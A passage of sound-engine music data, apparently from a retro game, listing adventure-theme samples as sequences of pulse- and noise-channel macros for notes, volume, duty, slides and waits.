AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .) music_adventure_sample_11: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(37,1,0,15,0) AUDIO_PULSE_META_WAIT_DUT_USLIDE(1,2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) SAMPLE_END .) music_adventure_sample_12: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) SAMPLE_END .) music_adventure_sample_13: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_14: .( SAMPLE_END .) music_adventure_sample_15: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_USLIDE(2,-3) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,4) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) SAMPLE_END .) music_adventure_sample_16: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(29,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_17: .( SAMPLE_END .) music_adventure_sample_18: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_19: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,38) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_20: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_21: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(29,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_22: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,27) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_23: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_USLIDE(2,-3) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_24: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_25: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_26: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_27: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,43) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_28: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_29: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_DSLIDE(48,1,2,0) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(0) SAMPLE_END .) music_adventure_sample_30: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_31: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_32: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(39,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_33: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_34: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(53,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_35: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_36: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(44,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(48,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_37: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(51,1,2,3,0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) SAMPLE_END .) music_adventure_sample_38: .( AUDIO_PULSE_META_NOTE_DSLIDE(39,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(38,1,0) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) SAMPLE_END .) music_adventure_sample_39: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(2,29) AUDIO_PULSE_META_NOTE_USLIDE(43,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(41,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(39,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) AUDIO_PULSE_META_NOTE_USLIDE(36,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(7,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(8,0) HALT(0) AUDIO_PULSE_META_NOTE_USLIDE(34,1,-2) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(7,0) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) 